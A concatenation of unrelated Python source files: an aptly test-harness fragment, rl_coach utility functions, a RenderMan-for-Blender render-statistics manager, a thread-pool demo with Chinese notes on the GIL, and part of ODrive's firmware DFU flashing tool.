self.verify_match(self.get_gold(), self.output, match_prepare=self.outputMatchPrepare)
except:
if self.captureResults:
if self.outputMatchPrepare is not None:
self.output = self.outputMatchPrepare(self.output)
with open(self.get_gold_filename(), "w") as f:
f.write(self.output)
else:
raise
def check_cmd_output(self, command, gold_name, match_prepare=None, expected_code=0):
output = self.run_cmd(command, expected_code=expected_code)
try:
self.verify_match(self.get_gold(gold_name), output, match_prepare)
except:
if self.captureResults:
if match_prepare is not None:
output = match_prepare(output)
with open(self.get_gold_filename(gold_name), "w") as f:
f.write(output)
else:
raise
def read_file(self, path):
with open(os.path.join(os.environ["HOME"], ".aptly", path), "r") as f:
return f.read()
def delete_file(self, path):
os.unlink(os.path.join(os.environ["HOME"], ".aptly", path))
def check_file_contents(self, path, gold_name, match_prepare=None):
contents = self.read_file(path)
try:
self.verify_match(self.get_gold(gold_name), contents, match_prepare=match_prepare)
except:
if self.captureResults:
with open(self.get_gold_filename(gold_name), "w") as f:
f.write(contents)
else:
raise
def check_file(self):
contents = open(self.checkedFile, "r").read()
try:
self.verify_match(self.get_gold(), contents)
except:
if self.captureResults:
with open(self.get_gold_filename(), "w") as f:
f.write(contents)
else:
raise
def check_exists(self, path):
if not os.path.exists(os.path.join(os.environ["HOME"], ".aptly", path)):
raise Exception("path %s doesn't exist" % (path, ))
def check_not_exists(self, path):
if os.path.exists(os.path.join(os.environ["HOME"], ".aptly", path)):
raise Exception("path %s exists" % (path, ))
def check_file_not_empty(self, path):
if os.stat(os.path.join(os.environ["HOME"], ".aptly", path))[6] == 0:
raise Exception("file %s is empty" % (path, ))
def check_equal(self, a, b):
if a != b:
self.verify_match(a, b, match_prepare=pprint.pformat)
def verify_match(self, a, b, match_prepare=None):
if match_prepare is not None:
a = match_prepare(a)
b = match_prepare(b)
if a != b:
diff = "".join(difflib.unified_diff([l + "\n" for l in a.split("\n")], [l + "\n" for l in b.split("\n")]))
raise Exception("content doesn't match:\n" + diff + "\n")
check = check_output
def prepare(self):
self.prepare_remove_all()
self.prepare_default_config()
self.prepare_fixture()
def start_webserver(self, directory):
FileHTTPServerRequestHandler.rootPath = directory
self.webserver = ThreadedTCPServer(("localhost", 0), FileHTTPServerRequestHandler)
server_thread = threading.Thread(target=self.webserver.serve_forever)
server_thread.daemon = True
server_thread.start()
return "http://%s:%d/" % self.webserver.server_address
def shutdown(self):
if hasattr(self, 'webserver'):
self.shutdown_webserver()
def shutdown_webserver(self):
self.webserver.shutdown()
@classmethod
def shutdown_class(cls):
pass
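# Illustrative sketch of how BaseTest is meant to be subclassed (not part of the
# library; the command and class name below are hypothetical). The runner calls
# prepare(), run() and check(); check_output() compares stdout against a gold
# file named "<ClassName>_gold" placed next to the test module.
#   class ExampleVersionTest(BaseTest):
#       runCmd = "aptly version"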
|
utils.py
|
#
# Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import importlib
import importlib.util
import inspect
import os
import re
import signal
import sys
import threading
import time
import traceback
from multiprocessing import Manager
from subprocess import Popen
from typing import List, Tuple, Union
import atexit
import numpy as np
from rl_coach.logger import screen
killed_processes = []
eps = np.finfo(np.float32).eps
def lower_under_to_upper(s):
s = s.replace('_', ' ')
s = s.title()
return s.replace(' ', '')
def get_base_dir():
return os.path.dirname(os.path.realpath(__file__))
def list_all_presets():
presets_path = os.path.join(get_base_dir(), 'presets')
return [f.split('.')[0] for f in os.listdir(presets_path) if f.endswith('.py') and f != '__init__.py']
def list_all_classes_in_module(module):
return [k for k, v in inspect.getmembers(module, inspect.isclass) if v.__module__ == module.__name__]
def parse_bool(value):
return {'true': True, 'false': False}.get(value.strip().lower(), value)
def convert_to_ascii(data):
    # Python 3 version of the recursive conversion: strings are parsed for booleans,
    # mappings and iterables are converted element by element.
    from collections.abc import Iterable, Mapping
    if isinstance(data, str):
        return parse_bool(str(data))
    elif isinstance(data, Mapping):
        return dict(map(convert_to_ascii, data.items()))
    elif isinstance(data, Iterable):
        return type(data)(map(convert_to_ascii, data))
    else:
        return data
def break_file_path(path):
base = os.path.splitext(os.path.basename(path))[0]
extension = os.path.splitext(os.path.basename(path))[1]
dir = os.path.dirname(path)
return dir, base, extension
def is_empty(str):
return str == 0 or len(str.replace("'", "").replace("\"", "")) == 0
def path_is_valid_dir(path):
return os.path.isdir(path)
def remove_suffix(name, suffix_start):
for s in suffix_start:
split = name.find(s)
if split != -1:
name = name[:split]
return name
def parse_int(value):
import ast
try:
int_value = int(value)
return int_value if int_value == value else value
except:
pass
try:
return ast.literal_eval(value)
except:
return value
def set_gpu(gpu_id):
os.environ['CUDA_VISIBLE_DEVICES'] = str(gpu_id)
def set_cpu():
set_gpu("")
# dictionary to class
class DictToClass(object):
def __init__(self, data):
        for name, value in data.items():
setattr(self, name, self._wrap(value))
def _wrap(self, value):
if isinstance(value, (tuple, list, set, frozenset)):
return type(value)([self._wrap(v) for v in value])
else:
return DictToClass(value) if isinstance(value, dict) else value
# class to dictionary
def ClassToDict(x):
# return dict((key, getattr(x, key)) for key in dir(x) if key not in dir(x.__class__))
dictionary = x.__dict__
return {key: dictionary[key] for key in dictionary.keys() if not key.startswith('__')}
def cmd_line_run(result, run_cmd, id=-1):
p = Popen(run_cmd, shell=True, executable="bash")
while result[0] is None or result[0] == [None]:
if id in killed_processes:
p.kill()
result[0] = p.poll()
def threaded_cmd_line_run(run_cmd, id=-1):
runThread = []
result = [[None]]
try:
params = (result, run_cmd, id)
runThread = threading.Thread(name='runThread', target=cmd_line_run, args=params)
runThread.daemon = True
runThread.start()
except:
runThread.join()
return result
class Signal(object):
"""
Stores a stream of values and provides methods like get_mean and get_max
which returns the statistics about accumulated values.
"""
def __init__(self, name):
self.name = name
self.sample_count = 0
self.values = []
def reset(self):
self.sample_count = 0
self.values = []
def add_sample(self, sample):
"""
:param sample: either a single value or an array of values
"""
self.values.append(sample)
def _get_values(self):
if type(self.values[0]) == np.ndarray:
return np.concatenate(self.values)
else:
return self.values
def get_last_value(self):
if len(self.values) == 0:
return np.nan
else:
return self._get_values()[-1]
def get_mean(self):
if len(self.values) == 0:
return ''
return np.mean(self._get_values())
def get_max(self):
if len(self.values) == 0:
return ''
return np.max(self._get_values())
def get_min(self):
if len(self.values) == 0:
return ''
return np.min(self._get_values())
def get_stdev(self):
if len(self.values) == 0:
return ''
return np.std(self._get_values())
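# Minimal usage sketch of Signal (illustrative values):
#   reward_signal = Signal('reward')
#   reward_signal.add_sample(np.array([1.0, 2.0, 3.0]))
#   reward_signal.add_sample(np.array([4.0]))
#   reward_signal.get_mean()  # -> 2.5, computed over the concatenated samples
#   reward_signal.get_max()   # -> 4.0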
def force_list(var):
if isinstance(var, list):
return var
else:
return [var]
def squeeze_list(var):
if type(var) == list and len(var) == 1:
return var[0]
else:
return var
def get_open_port():
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
class timeout:
def __init__(self, seconds=1, error_message='Timeout'):
self.seconds = seconds
self.error_message = error_message
def _handle_timeout(self, signum, frame):
raise TimeoutError(self.error_message)
def __enter__(self):
signal.signal(signal.SIGALRM, self._handle_timeout)
signal.alarm(self.seconds)
def __exit__(self, type, value, traceback):
signal.alarm(0)
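# Usage sketch for the timeout context manager (Unix only, since it relies on
# SIGALRM; do_slow_work below is a hypothetical call):
#   with timeout(seconds=2, error_message='operation took too long'):
#       do_slow_work()   # raises TimeoutError if it runs longer than 2 seconds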
def switch_axes_order(observation, from_type='channels_first', to_type='channels_last'):
"""
transpose an observation axes from channels_first to channels_last or vice versa
:param observation: a numpy array
:param from_type: can be 'channels_first' or 'channels_last'
:param to_type: can be 'channels_first' or 'channels_last'
:return: a new observation with the requested axes order
"""
if from_type == to_type or len(observation.shape) == 1:
return observation
assert 2 <= len(observation.shape) <= 3, 'num axes of an observation must be 2 for a vector or 3 for an image'
assert type(observation) == np.ndarray, 'observation must be a numpy array'
if len(observation.shape) == 3:
if from_type == 'channels_first' and to_type == 'channels_last':
return np.transpose(observation, (1, 2, 0))
elif from_type == 'channels_last' and to_type == 'channels_first':
return np.transpose(observation, (2, 0, 1))
else:
return np.transpose(observation, (1, 0))
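# Illustrative shape check for switch_axes_order (assuming an 84x84 RGB observation):
#   switch_axes_order(np.zeros((3, 84, 84)), 'channels_first', 'channels_last').shape  # -> (84, 84, 3)
#   switch_axes_order(np.zeros((4, 7)), 'channels_first', 'channels_last').shape       # -> (7, 4)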
def stack_observation(curr_stack, observation, stack_size):
"""
Adds a new observation to an existing stack of observations from previous time-steps.
:param curr_stack: The current observations stack.
:param observation: The new observation
:param stack_size: The required stack size
:return: The updated observation stack
"""
if curr_stack == []:
# starting an episode
curr_stack = np.vstack(np.expand_dims([observation] * stack_size, 0))
curr_stack = switch_axes_order(curr_stack, from_type='channels_first', to_type='channels_last')
else:
curr_stack = np.append(curr_stack, np.expand_dims(np.squeeze(observation), axis=-1), axis=-1)
curr_stack = np.delete(curr_stack, 0, -1)
return curr_stack
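# Illustrative use of stack_observation (assuming 84x84 grayscale frames and a stack of 4):
#   stack = stack_observation([], np.zeros((84, 84)), 4)      # -> shape (84, 84, 4)
#   stack = stack_observation(stack, np.zeros((84, 84)), 4)   # still (84, 84, 4), oldest frame dropped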
def call_method_for_all(instances: List, method: str, args=[], kwargs={}) -> List:
"""
Calls the same function for all the class instances in the group
:param instances: a list of class instances to apply the method on
:param method: the name of the function to be called
:param args: the positional parameters of the method
:param kwargs: the named parameters of the method
:return: a list of the returns values for all the instances
"""
result = []
if not isinstance(args, list):
args = [args]
sub_methods = method.split('.') # we allow calling an internal method such as "as_level_manager.train"
for instance in instances:
sub_instance = instance
for sub_method in sub_methods:
if not hasattr(sub_instance, sub_method):
raise ValueError("The requested instance method {} does not exist for {}"
.format(sub_method, '.'.join([str(instance.__class__.__name__)] + sub_methods)))
sub_instance = getattr(sub_instance, sub_method)
result.append(sub_instance(*args, **kwargs))
return result
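# Illustrative call (the Signal instances below are just stand-ins for any group of objects):
#   signals = [Signal('a'), Signal('b')]
#   call_method_for_all(signals, 'add_sample', args=[1.0])   # calls add_sample(1.0) on each
#   call_method_for_all(signals, 'get_last_value')           # -> [1.0, 1.0]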
def set_member_values_for_all(instances: List, member: str, val) -> None:
"""
Calls the same function for all the class instances in the group
:param instances: a list of class instances to apply the method on
:param member: the name of the member to be changed
:param val: the new value to assign
:return: None
"""
for instance in instances:
if not hasattr(instance, member):
raise ValueError("The requested instance member does not exist")
setattr(instance, member, val)
def short_dynamic_import(module_path_and_attribute: str, ignore_module_case: bool=False):
"""
Import by "path:attribute"
:param module_path_and_attribute: a path to a python file (using dots to separate dirs), followed by a ":" and
an attribute name to import from the path
:return: the requested attribute
"""
if '/' in module_path_and_attribute:
"""
Imports a class from a module using the full path of the module. The path should be given as:
<full absolute module path with / including .py>:<class name to import>
And this will be the same as doing "from <full absolute module path> import <class name to import>"
"""
return dynamic_import_from_full_path(*module_path_and_attribute.split(':'),
ignore_module_case=ignore_module_case)
else:
"""
Imports a class from a module using the relative path of the module. The path should be given as:
<full absolute module path with . and not including .py>:<class name to import>
And this will be the same as doing "from <full relative module path> import <class name to import>"
"""
return dynamic_import(*module_path_and_attribute.split(':'),
ignore_module_case=ignore_module_case)
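# Illustrative call (assuming this module is importable as rl_coach.utils):
#   short_dynamic_import('rl_coach.utils:Signal')   # same as "from rl_coach.utils import Signal"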
def dynamic_import(module_path: str, class_name: str, ignore_module_case: bool=False):
if ignore_module_case:
module_name = module_path.split(".")[-1]
available_modules = os.listdir(os.path.dirname(module_path.replace('.', '/')))
for module in available_modules:
curr_module_ext = module.split('.')[-1].lower()
curr_module_name = module.split('.')[0]
if curr_module_ext == "py" and curr_module_name.lower() == module_name.lower():
module_path = '.'.join(module_path.split(".")[:-1] + [curr_module_name])
module = importlib.import_module(module_path)
class_ref = getattr(module, class_name)
return class_ref
def dynamic_import_from_full_path(module_path: str, class_name: str, ignore_module_case: bool=False):
if ignore_module_case:
module_name = module_path.split("/")[-1]
available_modules = os.listdir(os.path.dirname(module_path))
for module in available_modules:
curr_module_ext = module.split('.')[-1].lower()
curr_module_name = module.split('.')[0]
if curr_module_ext == "py" and curr_module_name.lower() == module_name.lower():
module_path = '.'.join(module_path.split("/")[:-1] + [curr_module_name])
spec = importlib.util.spec_from_file_location("module", module_path)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
class_ref = getattr(module, class_name)
return class_ref
def dynamic_import_and_instantiate_module_from_params(module_parameters, path=None, positional_args=[],
extra_kwargs={}):
"""
A function dedicated for coach modules like memory, exploration policy, etc.
Given the module parameters, it imports it and instantiates it.
:param module_parameters:
:return:
"""
import inspect
if path is None:
path = module_parameters.path
module = short_dynamic_import(path)
args = set(inspect.getfullargspec(module).args).intersection(module_parameters.__dict__)
args = {k: module_parameters.__dict__[k] for k in args}
args = {**args, **extra_kwargs}
return short_dynamic_import(path)(*positional_args, **args)
def last_sample(state):
"""
given a batch of states, return the last sample of the batch with length 1
batch axis.
"""
return {
k: np.expand_dims(v[-1], 0)
for k, v in state.items()
}
def get_all_subclasses(cls):
if len(cls.__subclasses__()) == 0:
return []
ret = []
for drv in cls.__subclasses__():
ret.append(drv)
ret.extend(get_all_subclasses(drv))
return ret
class SharedMemoryScratchPad(object):
def __init__(self):
self.dict = {}
def add(self, key, value):
self.dict[key] = value
def get(self, key, timeout=30):
start_time = time.time()
timeout_passed = False
while key not in self.dict and not timeout_passed:
time.sleep(0.1)
timeout_passed = (time.time() - start_time) > timeout
if timeout_passed:
return None
return self.dict[key]
def internal_call(self, key, func, args: Tuple):
if type(args) != tuple:
args = (args,)
return getattr(self.dict[key], func)(*args)
class Timer(object):
def __init__(self, prefix):
self.prefix = prefix
def __enter__(self):
self.start = time.time()
def __exit__(self, type, value, traceback):
print(self.prefix, time.time() - self.start)
class ReaderWriterLock(object):
def __init__(self):
# self.num_readers_lock = Manager().Lock() # GK
# self.writers_lock = Manager().Lock() # GK
self.num_readers = 0
self.now_writing = False
def some_worker_is_reading(self):
return self.num_readers > 0
def some_worker_is_writing(self):
return self.now_writing is True
def lock_writing_and_reading(self):
# self.writers_lock.acquire() # first things first - block all other writers #GK
self.now_writing = True # block new readers who haven't started reading yet
while self.some_worker_is_reading(): # let existing readers finish their homework
time.sleep(0.05)
def release_writing_and_reading(self):
self.now_writing = False # release readers - guarantee no readers starvation
# self.writers_lock.release() # release writers #GK
def lock_writing(self):
while self.now_writing:
time.sleep(0.05)
# self.num_readers_lock.acquire() #GK
self.num_readers += 1
# self.num_readers_lock.release() #GK
def release_writing(self):
# self.num_readers_lock.acquire() #GK
self.num_readers -= 1
# self.num_readers_lock.release() #GK
class ProgressBar(object):
def __init__(self, max_value):
self.start_time = time.time()
self.max_value = max_value
self.current_value = 0
def update(self, current_value, additional_info=""):
self.current_value = current_value
percentage = int((100 * current_value) / self.max_value)
sys.stdout.write("\rProgress: ({}/{}) Time: {} sec {}%|{}{}| {}"
.format(current_value, self.max_value,
round(time.time() - self.start_time, 2),
percentage, '#' * int(percentage / 10),
' ' * (10 - int(percentage / 10)),
additional_info))
sys.stdout.flush()
def close(self):
print("")
def start_shell_command_and_wait(command):
p = Popen(command, shell=True, preexec_fn=os.setsid)
def cleanup():
os.killpg(os.getpgid(p.pid), 15)
atexit.register(cleanup)
p.wait()
atexit.unregister(cleanup)
def indent_string(string):
return '\t' + string.replace('\n', '\n\t')
def get_latest_checkpoint(checkpoint_dir: str, checkpoint_prefix: str, checkpoint_file_extension: str) -> str:
latest_checkpoint_id = -1
latest_checkpoint = ''
# get all checkpoint files
for fname in os.listdir(checkpoint_dir):
path = os.path.join(checkpoint_dir, fname)
if os.path.isdir(path) or fname.split('.')[-1] != checkpoint_file_extension or checkpoint_prefix not in fname:
continue
checkpoint_id = int(fname.split('_')[0])
if checkpoint_id > latest_checkpoint_id:
latest_checkpoint = fname
latest_checkpoint_id = checkpoint_id
return latest_checkpoint
|
rman_stats.py
|
import re
import os
import sys
import json
import bpy
import rman
import threading
import time
from collections import OrderedDict
import rman_utils.stats_config.core as stcore
from . import rman_render
from .rfb_utils import prefs_utils
from .rfb_logger import rfb_log
__oneK2__ = 1024.0*1024.0
__RFB_STATS_MANAGER__ = None
__LIVE_METRICS__ = [
["/system.processMemory", "Memory"],
["/rman/raytracing.numRays", "Rays/Sec"],
["/rman/renderer@progress", None],
['/rman@iterationComplete', None],
["/rman.timeToFirstRaytrace", "First Ray"],
["/rman.timeToFirstPixel", "First Pixel"],
["/rman.timeToFirstIteration", "First Iteration"],
]
class RfBBaseMetric(object):
def __init__(self, key, label):
self.key = key
self.label = label
class RfBStatsManager(object):
def __init__(self, rman_render):
global __RFB_STATS_MANAGER__
global __LIVE_METRICS__
self.mgr = None
self.create_stats_manager()
self.render_live_stats = OrderedDict()
self.render_stats_names = OrderedDict()
self._prevTotalRays = 0
self._progress = 0
self._prevTotalRaysValid = True
for name,label in __LIVE_METRICS__:
if label:
self.render_live_stats[label] = '--'
self.render_stats_names[name] = label
self.export_stat_label = ''
self.export_stat_progress = 0.0
self._integrator = 'PxrPathTracer'
self._maxSamples = 0
self._iterations = 0
self._decidither = 0
self._res_mult = 0.0
self.web_socket_enabled = False
self.boot_strap_thread = None
self.boot_strap_thread_kill = False
# roz objects
self.rman_stats_session_name = "RfB Stats Session"
self.rman_stats_session = None
self.rman_stats_session_config = None
self.rman_render = rman_render
self.init_stats_session()
self.create_stats_manager()
__RFB_STATS_MANAGER__ = self
def __del__(self):
if self.boot_strap_thread.is_alive():
self.boot_strap_thread_kill = True
self.boot_strap_thread.join()
@classmethod
    def get_stats_manager(cls):
global __RFB_STATS_MANAGER__
return __RFB_STATS_MANAGER__
def reset(self):
for label in self.render_live_stats.keys():
self.render_live_stats[label] = '--'
self._prevTotalRays = 0
self._progress = 0
self._prevTotalRaysValid = True
self.export_stat_label = ''
self.export_stat_progress = 0.0
def create_stats_manager(self):
if self.mgr:
return
try:
self.mgr = stcore.StatsManager()
self.is_valid = self.mgr.is_valid
except:
self.mgr = None
self.is_valid = False
def init_stats_session(self):
self.rman_stats_session_config = rman.Stats.SessionConfig(self.rman_stats_session_name)
# look for a custom stats.ini file
rman_stats_config_path = os.environ.get('RMAN_STATS_CONFIG_PATH', None)
if rman_stats_config_path:
if os.path.exists(os.path.join(rman_stats_config_path, 'stats.ini')):
self.rman_stats_session_config.LoadConfigFile(rman_stats_config_path, 'stats.ini')
self.update_session_config()
self.rman_stats_session = rman.Stats.AddSession(self.rman_stats_session_config)
def update_session_config(self):
self.web_socket_enabled = prefs_utils.get_pref('rman_roz_webSocketServer', default=False)
self.web_socket_port = prefs_utils.get_pref('rman_roz_webSocketServer_Port', default=9723)
config_dict = dict()
config_dict["logLevel"] = int(prefs_utils.get_pref('rman_roz_logLevel', default='3'))
config_dict["grpcServer"] = prefs_utils.get_pref('rman_roz_grpcServer', default=True)
config_dict["webSocketPort"] = self.web_socket_port
config_dict["webSocketServer"] = self.web_socket_enabled
config_str = json.dumps(config_dict)
self.rman_stats_session_config.Update(config_str)
if self.rman_stats_session:
self.rman_stats_session.Update(self.rman_stats_session_config)
if self.web_socket_enabled:
#self.attach()
pass
else:
self.disconnect()
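        # Illustrative config_str built above (actual values come from the add-on
        # preferences; keys mirror the dict assembled in this method):
        #   {"logLevel": 3, "grpcServer": true, "webSocketPort": 9723, "webSocketServer": false}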
def boot_strap(self):
while not self.mgr.clientConnected():
time.sleep(0.01)
if self.boot_strap_thread_kill:
return
if self.mgr.failedToConnect():
rfb_log().error('Failed to connect to stats web socket server.')
return
if self.mgr.clientConnected():
for name,label in __LIVE_METRICS__:
# Declare interest
self.mgr.enableMetric(name)
return
    def attach(self):
        if not self.mgr:
            return
        if self.mgr.clientConnected():
            return
        host = self.mgr.config["webSocketHost"]
        port = self.web_socket_port
        # The connectToServer call is a set of asynchronous calls, so we spin up
        # a thread to check the connection and then enable the metrics
        self.mgr.connectToServer(host, port)
# if the bootstrap thread is still running, kill it
if self.boot_strap_thread:
if self.boot_strap_thread.is_alive():
self.boot_strap_thread_kill = True
self.boot_strap_thread.join()
self.boot_strap_thread_kill = False
self.boot_strap_thread = False
self.boot_strap_thread = threading.Thread(target=self.boot_strap)
self.boot_strap_thread.start()
def is_connected(self):
return (self.web_socket_enabled and self.mgr and self.mgr.clientConnected())
def disconnect(self):
if self.is_connected():
self.mgr.disconnectFromServer()
def get_status(self):
if self.is_connected():
return 'Connected'
elif self.mgr.failedToConnect():
return 'Connection Failed'
else:
return 'Disconnected'
def check_payload(self, jsonData, name):
try:
dat = jsonData[name]
return dat
except KeyError:
# could not find the metric name in the JSON
# try re-registering it again
self.mgr.enableMetric(name)
return None
def update_payloads(self):
""" Get the latest payload data from Roz via the websocket client in the
manager object. Data comes back as a JSON-formatted string which is
then parsed to update the appropriate payload field widgets.
"""
if not self.is_connected():
self.draw_stats()
return
latest = self.mgr.getLatestData()
if (latest):
            # Load the JSON-formatted string into a Python dict
try:
jsonData = json.loads(latest)
except json.decoder.JSONDecodeError:
rfb_log().debug("Could not decode stats payload JSON.")
jsonData = dict()
pass
for name, label in self.render_stats_names.items():
dat = self.check_payload(jsonData, name)
if not dat:
continue
if name == "/system.processMemory":
# Payload has 3 floats: max, resident, XXX
# Convert resident mem to MB : payload[1] / 1024*1024;
memPayload = dat["payload"].split(',')
maxresMB = ((float)(memPayload[1])) / __oneK2__
# Set consistent fixed point output in string
self.render_live_stats[label] = "{:.2f} MB".format(maxresMB)
elif name == "/rman/raytracing.numRays":
currentTotalRays = int(dat['payload'])
if currentTotalRays <= self._prevTotalRays:
self._prevTotalRaysValid = False
# Synthesize into per second
if self._prevTotalRaysValid:
                        # The metric is sampled roughly every 16 ms (1000 / 16 = 62.5 samples per second)
diff = currentTotalRays - self._prevTotalRays
raysPerSecond = float(diff * 62.5)
if raysPerSecond > 1000000000.0:
self.render_live_stats[label] = "{:.3f}B".format(raysPerSecond / 1000000000.0)
elif raysPerSecond > 1000000.0:
self.render_live_stats[label] = '{:.3f}M'.format(raysPerSecond / 1000000.0)
elif raysPerSecond > 1000.0:
self.render_live_stats[label] = '{:.3f}K'.format(raysPerSecond / 1000.0)
else:
self.render_live_stats[label] = '{:.3f}'.format(raysPerSecond)
self._prevTotalRaysValid = True
self._prevTotalRays = currentTotalRays
elif name == "/rman@iterationComplete":
itr = eval(dat['payload'])[0]
self._iterations = itr
self.render_live_stats[label] = '%d / %d' % (itr, self._maxSamples)
elif name == "/rman/renderer@progress":
progressVal = int(float(dat['payload']))
self._progress = progressVal
elif name in ["/rman.timeToFirstRaytrace",
"/rman.timeToFirstPixel",
"/rman.timeToFirstIteration"]:
self.render_live_stats[label] = '%s secs' % str(dat['payload'])
else:
self.render_live_stats[label] = str(dat['payload'])
self.draw_stats()
def set_export_stats(self, label, progress):
self.export_stat_label = label
self.export_stat_progress = progress
def draw_stats(self):
if self.rman_render.rman_is_exporting:
self.draw_export_stats()
else:
self.draw_render_stats()
def draw_export_stats(self):
if self.rman_render.bl_engine:
try:
if self.rman_render.rman_interactive_running:
progress = int(self.export_stat_progress*100)
self.rman_render.bl_engine.update_stats('RenderMan (Stats)', "\n%s: %d%%" % (self.export_stat_label, progress))
else:
progress = int(self.export_stat_progress*100)
self.rman_render.bl_engine.update_stats(self.export_stat_label, "%d%%" % progress)
progress = self.export_stat_progress
self.rman_render.bl_engine.update_progress(progress)
except:
rfb_log().debug("Cannot update progress")
def draw_render_stats(self):
if not self.rman_render.rman_running:
return
_stats_to_draw = [
"Memory",
"Rays/Sec",
]
if self.rman_render.rman_interactive_running:
message = '\n%s, %d, %d%%' % (self._integrator, self._decidither, self._res_mult)
if self.is_connected():
for label in _stats_to_draw:
data = self.render_live_stats[label]
message = message + '\n%s: %s' % (label, data)
# iterations
message = message + '\nIterations: %d / %d' % (self._iterations, self._maxSamples)
try:
self.rman_render.bl_engine.update_stats('RenderMan (Stats)', message)
except ReferenceError as e:
rfb_log().debug("Error calling update stats (%s). Aborting..." % str(e))
return
else:
message = ''
if self.is_connected():
for label in _stats_to_draw:
data = self.render_live_stats[label]
message = message + '%s: %s ' % (label, data)
# iterations
message = message + 'Iterations: %d / %d ' % (self._iterations, self._maxSamples)
else:
message = '(no stats connection) '
try:
self.rman_render.bl_engine.update_stats(message, "%d%%" % self._progress)
progress = float(self._progress) / 100.0
self.rman_render.bl_engine.update_progress(progress)
except ReferenceError as e:
rfb_log().debug("Error calling update stats (%s). Aborting..." % str(e))
return
|
threadPool.py
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
import threading
import time
from queue import Queue
# Create a queue instance to hold the tasks
queue = Queue()
# Define the task that the thread pool workers will execute
def do_job():
while True:
i = queue.get() # Remove and return an item from the queue.
time.sleep(1)
print("index {}, current: {}".format(i, threading.current_thread()))
        queue.task_done()  # Indicate that a formerly enqueued task is complete; the queue's count of unfinished tasks decreases
if __name__ == '__main__':
    # Create a thread pool of 3 threads
    # Mark the pool threads as daemon threads: when the main thread exits, the daemon threads exit automatically.
    # With the default daemon=False, the non-daemon threads would block the main thread from exiting, so even after
    # the queue's tasks are done the pool would keep looping forever waiting for work and the main thread would never exit.
for i in range(3):
t = threading.Thread(target=do_job)
        t.daemon = True  # Daemon thread: when the main thread exits, the daemon thread exits too, even if it is still running
t.start()
    # Simulate queueing 10 tasks 3 seconds after the thread pool is created
time.sleep(3)
for i in range(10):
queue.put(i)
    queue.join()  # Block the main thread until the task queue has been drained
"""
GIL对线程的影响
因为python线程虽然时真正的线程,但是解释器执行代码,有一个GIL锁,Global Interpreter Lock.任何Python线程执行前,必须先获取GIL
锁,然后,每执行100条字节码,解释器就自动释放GIL锁,让别的线程有机会执行,这个GIL全局锁实际上把所有线程的执行代码都给上了锁,所以,
多线程在Python中只能交替执行,即使100个线程跑在100核心CPU上,也只能用到1个核心。
对于IO密集型任务,多线程还是有很大效率提升,
线程池要设置为多少?
计算线程数设置的公式?
N核服务器,执行逻辑单线程本地计算时间X,等待时间Y,工作线程数 = N*(x+y)/ x
"""
|
dfu.py
|
#!/usr/bin/env python
"""
Tool for flashing .hex files to the ODrive via the STM built-in USB DFU mode.
"""
from __future__ import print_function
import argparse
import sys
import time
import threading
import platform
import struct
import requests
import re
import io
import os
import usb.core
import fibre
import odrive
from odrive.utils import Event, OperationAbortedException
from odrive.dfuse import *
try:
from intelhex import IntelHex
except ImportError:
sudo_prefix = "" if platform.system() == "Windows" else "sudo "
print("You need intelhex for this ({}pip install IntelHex)".format(sudo_prefix), file=sys.stderr)
sys.exit(1)
def get_fw_version_string(fw_version):
if (fw_version[0], fw_version[1], fw_version[2]) == (0, 0, 0):
return "[unknown version]"
else:
return "v{}.{}.{}{}".format(fw_version[0], fw_version[1], fw_version[2], "-dev" if fw_version[3] else "")
def get_hw_version_string(hw_version):
if hw_version == (0, 0, 0):
return "[unknown version]"
else:
return "v{}.{}{}".format(hw_version[0], hw_version[1], ("-" + str(hw_version[2]) + "V") if hw_version[2] > 0 else "")
def populate_sectors(sectors, hexfile):
"""
Checks for which on-device sectors there is data in the hex file and
returns a (sector, data) tuple for each touched sector where data
is a byte array of the same size as the sector.
"""
for sector in sectors:
addr = sector['addr']
size = sector['len']
# check if any segment from the hexfile overlaps with this sector
touched = False
for (start, end) in hexfile.segments():
if start < addr and end > addr:
touched = True
break
elif start >= addr and start < addr + size:
touched = True
break
if touched:
# TODO: verify if the section is writable
yield (sector, hexfile.tobinarray(addr, addr + size - 1))
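# Illustrative sketch (not part of the original tool): the touch test above, written as a
# single predicate over half-open ranges -- a hex-file segment [start, end) overlaps a
# sector [addr, addr + size) exactly when it starts before the sector ends and ends after
# the sector starts.
def _segment_touches_sector(start, end, addr, size):
    return start < addr + size and end > addr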
def get_first_mismatch_index(array1, array2):
"""
Compares two arrays and returns the index of the
first unequal item or None if both arrays are equal
"""
if len(array1) != len(array2):
raise Exception("arrays must be same size")
for pos in range(len(array1)):
if (array1[pos] != array2[pos]):
return pos
return None
def dump_otp(dfudev):
"""
Dumps the contents of the one-time-programmable
memory for debugging purposes.
The OTP is used to determine the board version.
"""
# 512 Byte OTP
otp_sector = [s for s in dfudev.sectors if s['name'] == 'OTP Memory' and s['addr'] == 0x1fff7800][0]
data = dfudev.read_sector(otp_sector)
print(' '.join('{:02X}'.format(x) for x in data))
# 16 lock bytes
otp_lock_sector = [s for s in dfudev.sectors if s['name'] == 'OTP Memory' and s['addr'] == 0x1fff7A00][0]
data = dfudev.read_sector(otp_lock_sector)
print(' '.join('{:02X}'.format(x) for x in data))
class Firmware():
def __init__(self):
self.fw_version = (0, 0, 0, True)
self.hw_version = (0, 0, 0)
@staticmethod
def is_newer(a, b):
a_num = (a[0], a[1], a[2])
b_num = (b[0], b[1], b[2])
if a_num == (0, 0, 0) or b_num == (0, 0, 0):
return False # Cannot compare unknown versions
return a_num > b_num or (a_num == b_num and not a[3] and b[3])
def __gt__(self, other):
"""
Compares two firmware versions. If both versions are equal, the
prerelease version is considered older than the release version.
"""
if not isinstance(other, tuple):
other = other.fw_version
return Firmware.is_newer(self.fw_version, other)
def __lt__(self, other):
"""
Compares two firmware versions. If both versions are equal, the
prerelease version is considered older than the release version.
"""
if not isinstance(other, tuple):
other = other.fw_version
return Firmware.is_newer(other, self.fw_version)
def is_compatible(self, hw_version):
"""
Determines if this firmware is compatible
with the specified hardware version
"""
return self.hw_version == hw_version
